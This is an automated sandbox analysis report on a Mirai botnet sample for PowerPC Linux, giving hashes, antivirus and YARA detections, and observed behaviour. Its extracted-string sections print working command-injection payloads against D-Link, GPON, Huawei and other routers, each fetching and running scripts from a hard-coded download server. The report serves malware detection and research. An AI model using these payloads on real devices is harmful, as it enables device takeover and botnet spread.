Linux Analysis Report
2EH9KnMcj7

Overview

General Information

Sample Name: 2EH9KnMcj7
Analysis ID: 679615
MD5: 85455cd1f6a69942e7432acdb3b15d70
SHA1: b3e68c30a45963c609e8d8f601cbc0e60e8181a6
SHA256: d56021eaf57dc41b3e3525d8137c2fd7055d54cdfc989e7bb5a571bea3cd2a52
Tags: 32elfmiraipowerpc
Infos:

Detection

Mirai
Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 2EH9KnMcj7 Avira: detected
Multi AV Scanner detection for submitted file
Source: 2EH9KnMcj7 Virustotal: Detection: 59% Perma Link
Source: 2EH9KnMcj7 Metadefender: Detection: 31% Perma Link
Source: 2EH9KnMcj7 ReversingLabs: Detection: 61%
Sample listens on a socket
Source: /tmp/2EH9KnMcj7 (PID: 6234) Socket: 127.0.0.1::44455 Jump to behavior
Source: 2EH9KnMcj7 String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: 2EH9KnMcj7 String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: 2EH9KnMcj7 String found in binary or memory: http://purenetworks.com/HNAP1/
Source: 2EH9KnMcj7 String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 2EH9KnMcj7 String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Yara signature match
Source: 2EH9KnMcj7, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.00007fd71802d000.00007fd71802e000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6234.1.00007fd71802d000.00007fd71802e000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6234.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1
Source: Initial sample Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample Potential command found: GET /index.php?s=/index/hink
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
Source: classification engine Classification label: mal64.troj.lin@0/0@0/0
Enumerates processes within the "proc" file system
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6196/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1582/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2033/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2275/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/3088/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6193/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1612/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1579/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1699/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1335/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1698/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2028/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1334/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1576/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2302/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/3236/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2025/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2146/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/910/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/912/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/517/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/759/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2307/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/918/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6243/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6242/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6244/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6247/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1594/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2285/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2281/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1349/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1623/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/761/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1622/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/884/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1983/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2038/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1344/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1465/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1586/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1463/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2156/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/800/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6238/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/801/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1629/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1627/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1900/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6252/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6251/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6255/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6257/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/3021/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/491/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2294/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2050/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1877/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/772/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1633/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1599/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1632/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/774/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1477/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/654/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/896/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1476/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1872/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2048/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/655/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1475/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2289/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/656/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/777/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/657/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/4466/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6249/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/658/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/4467/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/4468/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/4469/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/419/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/936/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1639/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/4503/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1638/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2208/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2180/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6262/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6267/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6266/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1809/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6268/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1494/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1890/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2063/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/2062/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/6260/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1888/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1886/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/420/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1489/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/785/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/1642/exe Jump to behavior
Source: /tmp/2EH9KnMcj7 (PID: 6236) File opened: /proc/788/exe Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/2EH9KnMcj7 (PID: 6234) Queries kernel information via 'uname': Jump to behavior
Source: 2EH9KnMcj7, 6234.1.0000561da275d000.0000561da280d000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc11!hotpluggableq
Source: 2EH9KnMcj7, 6237.1.0000561da275d000.0000561da280d000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc1
Source: 2EH9KnMcj7, 6234.1.0000561da275d000.0000561da280d000.rw-.sdmp, 2EH9KnMcj7, 6237.1.0000561da275d000.0000561da280d000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/ppc
Source: 2EH9KnMcj7, 6234.1.00007ffc0d2cd000.00007ffc0d2ee000.rw-.sdmp, 2EH9KnMcj7, 6237.1.00007ffc0d2cd000.00007ffc0d2ee000.rw-.sdmp Binary or memory string: /usr/bin/qemu-ppc
Source: 2EH9KnMcj7, 6234.1.00007ffc0d2cd000.00007ffc0d2ee000.rw-.sdmp, 2EH9KnMcj7, 6237.1.00007ffc0d2cd000.00007ffc0d2ee000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-ppc/tmp/2EH9KnMcj7SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/2EH9KnMcj7

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: 2EH9KnMcj7, type: SAMPLE
Source: Yara match File source: 6237.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6234.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: 2EH9KnMcj7, type: SAMPLE
Source: Yara match File source: 6237.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6234.1.00007fd718001000.00007fd71801c000.r-x.sdmp, type: MEMORY

No Screenshots

No contacted IP infos